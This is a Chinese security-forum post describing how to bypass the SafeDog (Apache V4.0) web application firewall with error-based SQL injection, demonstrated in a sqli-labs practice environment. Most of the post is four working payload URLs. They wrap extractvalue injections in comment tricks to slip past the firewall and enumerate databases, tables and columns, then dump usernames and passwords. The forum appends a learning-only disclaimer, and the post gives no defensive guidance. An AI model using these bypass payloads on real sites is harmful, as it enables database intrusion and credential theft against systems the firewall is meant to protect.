搜索
查看: 1977|回复: 0

【原创计划】报错注入绕过安全狗sql注入

[复制链接]

588

主题

862

帖子

2192

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2192

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2020-3-13 12:44:40 | 显示全部楼层 |阅读模式
本文作者:小右
作者寄语:练习时长两周半的web安全练习生

网站安全狗(Apache版)V4.0存在报错sql注入绕过
搭建环境:
WIN10+apache+php7
软件获取:
实验:
sqli-labs level1环境
测试环境是搭建成功:
查询数据库
/Less-1/?=/*&id=-1' and extractvalue(1,concat(0x3e,(select schema_name from information_schema.schemata limit 14,1),0x3e))%23*/--+
查询表
/Less-1/?=/*&id=-1' and extractvalue(1,concat(0x3e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x3e))%23*/--+
查询列
/Less-1/?=/*&id=-1' and extractvalue(1,concat(0x3e,(select group_concat(column_name) from information_schema.columns where table_name='user'),0x3e))%23*/--+
查询数据
/Less-1/?=/*&id=-1' and extractvalue(1,concat(0x3e,(select concat(username,0x23,password) from security.users where id=3),0x3e))%23*/--+

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

温馨提示
1:发帖请遵守《中华人民共和国网络安全法》,发帖内容不得维护国家的、集体的、个人的利益。
2:请勿发布恶意攻击他人的技术文章、工具、和使用教程,发现后删帖处理。
3:本站的目的在于让更多的人了解网络安全,避免受到他人的恶意攻击。
4:本站中的部分文章,可能会出现一些“技术类手段”,但这仅仅为学习演示所用,而非恶意传播技术。
5:本站中的部分文章,可能转载自互联网。如有侵权行为,联系我们删除即可。
6:学习仅是充实头脑,切勿恶意攻击个人、企业等。所造成的法律后果一切由自己承担,本站及其站长概不负责。
我知道了
快速回复 返回顶部 返回列表